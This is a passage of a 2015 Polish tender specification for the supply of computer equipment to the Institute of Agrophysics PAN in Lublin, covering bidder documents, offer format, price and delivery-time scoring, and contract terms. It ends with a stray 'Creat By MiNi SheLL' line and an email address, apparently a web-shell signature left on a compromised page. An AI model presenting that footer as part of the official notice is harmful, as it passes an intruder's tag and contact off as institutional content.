1)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt II:
a)	w ppkt 2) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III: 
a)	w pkt 1)a) ppkt 1 - zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)	w pkt 1)a) ppkt 2 - zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
IV. Dokumenty, jakie mają dostarczyć wykonawcy dotyczące przynależności do tej samej grupy kapitałowej:
1)	Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.) albo informacja o tym, że wykonawca nie należy do grupy kapitałowej 
(wg załącznika nr 7).
V. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: 
1) oświadczenie oraz dokumenty wymagane w pkt I mogą być złożone wspólnie przez wykonawców. W przypadku wykonawców wspólnie ubiegających się o udzielnie zamówienia, żaden z nich nie może podlegać wykluczeniu z postepowania, a warunki udziału mogą zostać spełnione łącznie przez wykonawców składających ofertę wspólną, czyli w przypadku wykonawców składających ofertę wspólną dokumenty przedkłada wykonawca spełniający dany warunek. W przypadku warunków określonych w art. 22 uPzp konieczność ich spełniania odnosi się do konsorcjum jako całości nie zaś do jego poszczególnych członków. Wykazanie spełnienia warunków z art. 22 uPzp podlega sumowaniu i łącznej ocenie zamawiającego.
2) dokumenty wymagane w pkt II (III) i IV winien złożyć każdy wykonawca samodzielnie.
VI. Forma dokumentów: 
1)	Oświadczenie o spełnieniu warunków udziału w postępowaniu, wymagane w pkt I ppkt 1 oraz dokumenty, o których mowa w pkt I ppkt 4 oraz pkt IV winny być składane w formie oryginału.
2)	Dokumenty, o których mowa w pkt I ppkt 2 i ppkt 3, pkt II, pkt III winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę - poświadczenie winno zawierać zapis odręczny lub w formie pieczęci za zgodność z oryginałem.
3)	Dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski

OPIS SPOSOBU PRZYGOTOWANIA OFERTY.
1)	Wykonawca może złożyć w niniejszym postępowaniu tylko jedną ofertę, sam lub jako partner w konsorcjum lub spółce cywilnej.
2)	Ofertę składa się, pod rygorem nieważności, w formie pisemnej. Zamawiający nie wyraża zgody na złożenie oferty w postaci elektronicznej, opatrzonej bezpiecznym podpisem elektronicznym, weryfikowanym przy pomocy ważnego kwalifikowanego certyfikatu.
3)	Oferta musi być napisana w języku polskim: na maszynie do pisania, komputerze lub ręcznie nieścieralnym atramentem oraz podpisana przez osobę lub osoby upoważnione do podejmowania zobowiązań w imieniu Wykonawcy zgodnie z wpisem o reprezentacji w stosownym dokumencie uprawniającym do występowania w obrocie prawnym lub udzielonym pełnomocnictwem. 
4)	Dokumenty składające się na ofertę sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski.
5)	Treść oferty musi odpowiadać treści Specyfikacji Istotnych Warunków Zamówienia.
6)	Ofertę należy sporządzić zgodnie z wymaganiami umieszczonymi w specyfikacji oraz dołączyć wszystkie wymagane dokumenty i oświadczenia. 
7)	Wykonawcy zobowiązani są złożyć następujące dokumenty oraz oświadczenia: 
1.	Oświadczenie oraz dokumenty wymagane w Rozdziale 6 specyfikacji istotnych warunków zamówienia. 
2.	Formularz ofertowy (wg załącznika nr 1) - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 
3.	Wypełnione zestawienie wymaganych parametrów technicznych i użytkowych, wg Załącznika nr 3 do SIWZ.
4.	Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej).
5.	Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba, której umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty.
8)	Dokumenty o których mowa w pkt 7) ppkt 2-3 winny być składane w formie pisemnej. Dokumenty winny być podpisane przez osobę upoważnioną do występowania w imieniu wykonawcy albo przez osobę umocowaną przez osobę uprawnioną, a w przypadku osób fizycznych przez wykonawcę albo przez osobę umocowaną przez wykonawcę. 
9)	Pełnomocnictwo, o którym mowa w pkt 7) ppkt 4-5 powinno być przedstawione w formie oryginału lub kopii poświadczonej w drodze czynności notarialnej w rozumieniu ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie (t.j. Dz.U.2014r. poz.164) 
10)	 Oferty wspólne
1.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy. (dotyczy również wspólników spółki cywilnej).
2.	Pełnomocnictwo, o którym mowa w pkt 7) ppkt 4 musi znajdować się w ofercie wspólnej wykonawców.
3.	Pełnomocnik pozostaje w kontakcie z zamawiającym w toku postępowania; zwraca się do zamawiającego z wszelkimi sprawami i do niego zamawiający kieruje informacje, korespondencję, itp.
4.	Sposób składania dokumentów w ofercie wspólnej:
a.	dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia, odpis z właściwego rejestru albo z centralnej ewidencji i informacji o działalności gospodarczej, informacja o przynależności do grupy kapitałowej - składa każdy z wykonawców składających ofertę wspólną w imieniu swojej firmy; jeżeli jednak podmiot występujący wspólnie (spółka cywilna) na podstawie odrębnych przepisów, dla celów podatkowych lub związanych z ubezpieczeniami jest traktowany jako jeden podmiot (jedna jednostka organizacyjna) - dokumenty te powinien złożyć niezależnie ten podmiot.
b.	dokumenty wspólne takie jak np.: oświadczenie o spełnianiu warunków udziału w postępowaniu, wykaz dostaw, formularz ofertowy, zestawienie wymaganych parametrów technicznych i użytkowych - składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną,
11)	Poprawki powinny być naniesione czytelnie oraz opatrzone podpisem lub parafą osoby upoważnionej.
12)	Ponadto zaleca się spięcie na trwałe wszystkich dokumentów, załączenie spisu treści oferty oraz ponumerowanie wszystkich stron oferty. 
13)	Zaleca się, aby wykonawca zamieścił ofertę w zewnętrznej i wewnętrznej kopercie z tym, że: 
1.	zewnętrzna koperta powinna być zaadresowana na Zamawiającego i zawierać oznaczenie:
oferta na: Dostawę sprzętu komputerowego do Instytutu Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w ramach projektu finansowanego przez NCBiR w ramach programu Biostrateg A-2401-23 - bez nazwy i pieczątki wykonawcy; 
koperta wewnętrzna powinna zawierać ofertę i być zaadresowana na wykonawcę, tak aby można było odesłać ofertę w przypadku jej wpłynięcia po terminie.
14)	Jeżeli Wykonawca składający ofertę chce zastrzec informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, to dokumenty te muszą być włożone w oddzielną kopertę opatrzoną klauzulą NIE UDOSTĘPNIAĆ. Nie mogą stanowić tajemnicy informacje podawane do wiadomości podczas otwarcia ofert. Wykonawca w takim przypadku nie później niż w terminie składania ofert, oprócz zastrzeżenia, że wskazane informacje nie mogą być udostępniane winien wykazać, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. 
15)	Wykonawca poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty

OPIS SPOSOBU OBLICZENIA CENY.
1)	Rozliczenia między Zamawiającym a wykonawcą będą dokonywane w polskich złotych (PLN) .
2)	Przez cenę należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy 
z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U.z 2014r., 
poz. 915 ). Jest to wartość wyrażona w jednostkach pieniężnych, którą Zamawiający jest obowiązany zapłacić Wykonawcy za towar lub usługę; w cenie uwzględnia się podatek od towarów i usług oraz podatek akcyzowy, jeżeli na podstawie odrębnych przepisów sprzedaż towaru (dostawy) podlega temu obciążeniu.
3)	Ceną ofertową ma być cena za zrealizowanie przedmiotu zamówienia zgodnie z jego opisem zawartym w opisie przedmiotu zamówienia zawartym w Szczegółowym opisie przedmiotu zamówienia tj. w załączniku nr 2 do SIWZ, a także we wzorach umów stanowiący załącznik nr 8 do niniejszej SIWZ. Cena oferty uwzględniać ma nie tylko wartość samej dostawy przedmiotu zamówienia, podatek od towarów i usług, 
ale również wszystkie inne składniki w tym w szczególności transport, opakowanie, ubezpieczenie towaru, opusty, rabaty, dojazd pracowników firmy w celu zainstalowania i uruchomienia przedmiotu zamówienia, przeszkolenia pracowników Zamawiającego, świadczenie usług serwisowych, oraz wszelkie inne koszty, konieczne dla zrealizowania przedmiotu zamówienia zgodnie z jego opisem 
i postanowieniami wzoru umowy.
4)	Cena, o której mowa w pkt 3), jest ostateczną ceną, jaką Zamawiający zapłaci za zrealizowanie przedmiotu zamówienia na warunkach określonych we wzorze umowy. Każdy z Wykonawców może zaproponować tylko jedną cenę ofertową i nie może jej zmienić. 
5)	Cena ma być podana z dokładnością do dwóch miejsc po przecinku. Wszelkie obliczenia należy dokonać z dokładnością do pełnych groszy (z dokładnością do dwóch miejsc po przecinku, zarówno przy kwotach netto, VAT i brutto), przy czym końcówki poniżej 0,5 grosza pomija się, a końcówki 0,5 grosza i wyższe zaokrągla się do 1 grosza. 
6)	Cenę ofertową należy podać cyfrowo i słownie w polskiej walucie (PLN) na formularzu oferty stanowiącym załącznik nr 1 do niniejszej SIWZ. Wykonawca podaje cenę ofertową netto i brutto (z podatkiem VAT).
7)	Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi przepisami.

13. OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE OFERTY, WRAZ Z PODANIEM ZNACZENIA TYCH KRYTERIÓW I SPOSOBU OCENY OFERT. 

Do wyboru najkorzystniejszej oferty Zamawiający posługiwał się będzie kryterium cenowym i terminem dostawy.

13.1. Kryteriami wyboru są cena i termin dostawy, przy czym cena stanowi 80% kryterium wyboru, a termin dostawy 20% kryterium wyboru. Wybór najkorzystniejszej oferty będzie dokonany na podstawie uzyskanej oceny oferty wyliczonej w oparciu o oceny poszczególnych kryteriów, na podstawie poniższego wzoru:
Ocena oferty = C + TD

Gdzie: C - ocena w kryterium Cena + TD - ocena w kryterium Termin dostawy.

Zamawiający dokona wyboru oferty o najwyższej sumie uzyskanych punktów w kryteriach, wskazanych w pkt. 13.2 i 13.3, wyliczonych zgodnie z niniejszym rozdziałem spośród ofert nie odrzuconych, złożonych przez Wykonawców nie podlegających wykluczeniu.

13.2 Ocena oferty w kryterium Cena - 80%, zostanie wyliczona za pomocą następującego wzoru:

C = (Cn : Co) x 100 pkt. x 80% 
Gdzie:
C - przyznane punkty;
Cn - najniższa cena ofertowa (brutto) spośród wszystkich ważnych ofert;
Co - cena oferty ocenianej (brutto).

13.2.1.	Każdy wykonawca będzie oceniany w kryterium cenowym w skali od 0 do 80 punktów.
           
13.3.	Ocena oferty w kryterium Termin dostawy - 20%.

13.3.1. W powyższym kryterium oceniana będzie łączna długość terminu dostawy. Zamawiający odniesie wartości z poszczególnych ofert do minimalnego oczekiwanego przez Zamawiającego terminu dostawy, czyli 10 dni, natomiast nie może być on dłuższy niż 20 dni.

TD = (20 dni - Tob) : 10 dni x 20%
   gdzie: 
        TD - przyznane punkty;
        Tob - termin oferty badanej (wyrażony w dniach).


13.3.1. Każdy wykonawca będzie oceniany w kryterium termin dostawy w skali od 0 do 20 punktów

UWAGA!!!
Zamawiający informuje, że w przypadku określenia przez Wykonawcę terminu dostawy krótszego niż 10 dni, Zamawiający przyjmie do obliczeń w kryterium oceny ofert Termin dostawy wartość 10 dni, natomiast termin wskazany przez Wykonawcę będzie wiążący do realizacji przez Niego zamówienia.
W przypadku określenia przez Wykonawcę terminu dostawy dłuższego niż 20 dni, oferta będzie odrzucona, jako niezgodna z SIWZ.
Termin dostawy będzie liczony od dnia zawarcia umowy.

Zaoferowanie terminu realizacji niezgodnego z wytycznymi Zamawiającego będzie skutkować odrzuceniem oferty zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp, jako niezgodnej z treścią SIWZ.
Wykonawca zobowiązany jest w ofercie wyrazić oferowany termin realizacji w dniach. W przypadku podania terminu realizacji w innej postaci Zamawiający dokona stosownych przeliczeń opierając się na postanowieniach Kodeksu cywilnego dotyczących tygodnia, miesiąca.
Wykonawca w oferowanym terminie realizacji zamówienia musi uwzględnić wszelkie ryzyka jakie mógł przewidzieć doświadczony Wykonawca, a w szczególności ryzyka związane z realizacją przedmiotu zamówienia.		
		
		

13.4. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska największą ilość punktów (100).
Ostateczna ilość punktów będzie liczona na podstawie poniższego wzoru:

P = C + TD
Gdzie:
P - ostateczna ilość punktów badanej oferty;
C - ilość punktów badanej oferty w kryterium Cena;
TD - ilość punktów badanej oferty w kryterium Termin Dostawy.

       		
13.4.1. Punkty za kryteria: cena oferty i kryterium terminu dostawy zostaną zsumowane. 

13.4.2. Każdy wykonawca będzie oceniany w skali od 0 do 100 punktów (za wszystkie kryteria).
13.4.3. W celu obliczenia punktów wyniki poszczególnych działań matematycznych będą zaokrąglane do dwóch miejsc po przecinku lub z większą dokładnością, jeśli przy zastosowaniu wymienionego zaokrąglenia nie występuje różnica w ilości przyznanych punktów.

13.4.4. Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego Zamawiającego, zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić  zgodnie z obowiązującymi przepisami.

13.4.5. Zamawiający udzieli zamówienia wykonawcy, którego oferta uzyska największą liczbę punktów łącznych.

INFORMACJA O FORMALNOŚCIACH, JAKIE POWINNY ZOSTAĆ DOPEŁNIONE PO WYBORZE OFERTY W CELU ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO.

1)	Informacje o formalnościach, jakie powinny być spełnione w celu zawarcia umowy:
1.	Zamawiający będzie zawierał stosowne umowy o realizację zamówienia publicznego z wybranym wykonawcą.
2.	Wykonawca ma obowiązek zawrzeć umowę zgodnie ze wzorem umowy stanowiącym załącznik nr  8 do niniejszej SIWZ. 
3.	Zawarta umowa będzie jawna i będzie podlegała udostępnianiu na zasadach określonych w przepisach o dostępie do informacji publicznej (art. 139 ust. 3 ustawy).
4.	Jeżeli jako najkorzystniejsza zostanie wybrana oferta Wykonawców - Konsorcjum lub Spółki cywilnej, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. Umowa regulująca współpracę tych podmiotów powinna zawierać: określenie celu gospodarczego, oświadczenia podmiotów o przyjęciu odpowiedzialności solidarnej, wskazanie podmiotu, któremu powierza się prowadzenie spraw i reprezentację na zewnątrz (lidera), oznaczenie czasu trwania umowy - wymaga się, aby czas trwania umowy był nie krótszy niż okres realizacji zamówienia. Umowa regulująca współpracę musi być podpisana tak, by zobowiązywała prawnie wszystkie podmioty gospodarcze oraz musi stwierdzać solidarną odpowiedzialność partnerów wobec Zamawiającego za wykonanie umowy. 
2)	Termin i miejsce zawarcia umowy.
1.	Zamawiający zawrze umowę w sprawie zamówienia publicznego, z zastrzeżeniem art. 183 ustawy, w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało przesłane w sposób określony w art. 27 ust. 2 ustawy pzp, albo 10 dni - jeżeli zostało przesłane w inny sposób.
2.	Umowa zostanie zawarta w siedzibie Zamawiającego, przed upływem terminu związania ofertą.
3.	Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o których mowa w pkt. 1, jeżeli w postępowaniu o udzielenie zamówienia została złożona tylko jedna oferta.

WYMAGANIA DOTYCZĄCE ZABEZPIECZENIA NALEŻYTEGO WYKONANIA UMOWY.
Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy

Załączniki do SIWZ:
Załącznik nr 1 - Wzór formularza oferty
Załącznik nr 2 - Szczegółowy opis przedmiotu zamówienia 
Załącznik nr 3 - Zestawienie wymaganych parametrów technicznych i użytkowych 
Załącznik nr 4 - Wzór oświadczenie o spełnieniu warunków udziału w postępowaniu 
Załącznik nr 5 - Wzór wykazu dostaw
Załącznik nr 6 - Wzór oświadczenia o braku podstaw do wykluczenia
Załącznik nr 7 - Wzór informacji o przynależności do grupy kapitałowej
Załącznik nr 8 - Wzór umowy 
Załącznik nr 9 - PassMark - CPU Mark Laptop & Portable CPU Performance - Updated 30th of July 2015
Załącznik nr 10 - PassMark - G3D Mark High Mid Range Videocards - Updated 30th of July 2015</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin dostawy - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ISTOTNE DLA STRON POSTANOWIENIA, KTÓRE ZOSTANĄ WPROWADZONE DO TREŚCI ZAWIERANEJ UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO, OGÓLNE WARUNKI UMOWY ALBO WZÓR UMOWY, JEŻELI ZAMAWIAJĄCY WYMAGA OD WYKONAWCY, ABY ZAWARŁ  Z NIM UMOWĘ W SPRAWIE ZAMÓWIENIA PUBLICZNEGO NA TAKICH WARUNKACH :

1)	Wzór umowy stanowi załącznik nr 8 do SIWZ.
2)	Zamawiający przewiduje możliwość zmiany umów w przypadku: 
1.	aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu urządzeń lub materiałów); zmiana nie może spowodować podwyższenia ceny wynikającej z oferty, na podstawie której był dokonany wybór wykonawcy; inicjatorem zmian może być Zamawiający lub wykonawca poprzez pisemne wystąpienie w okresie obowiązywania umowy zawierające opis proponowanych zmian, ich uzasadnienie oraz ewentualny termin wprowadzenia;
2.	konieczności zmiany terminu realizacji przedmiotu zamówienia z przyczyn niezawinionych przez strony (np. wydłużony czas oczekiwania na elementy wytwarzane przez producenta); zmiana nie może spowodować podwyższenia ceny wynikającej z oferty, na podstawie której był dokonany wybór wykonawcy; inicjatorem zmian może być Zamawiający lub wykonawca poprzez pisemne wystąpienie w okresie obowiązywania umowy zawierające opis proponowanych zmian, ich uzasadnienie oraz ewentualny termin wprowadzenia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ipan.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Agrofizyki im. Bohdana Dobrzańskiego Polskiej Akademii Nauk w Lublinie, ul. Doświadczalna 4, bud. A, pok. 10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2015 godzina 12:00, miejsce: Instytut Agrofizyki im. Bohdana Dobrzańskiego Polskiej Akademii Nauk w Lublinie, ul. Doświadczalna 4, bud. A, pok. 18 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> przetarg organizowany w w ramach projektu finansowanego przez NCBiR w ramach programu Biostrateg I Wsparcie dla rolnictwa niskoemisyjnego - zdolnego do adaptacji zmian klimatu obecnie oraz w perspektywie lat 2030 i 2050 (Zadanie 3) (akronim LCAgri, nr umowy BIOSTRATEG1 271322 3 NCBR 2015).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com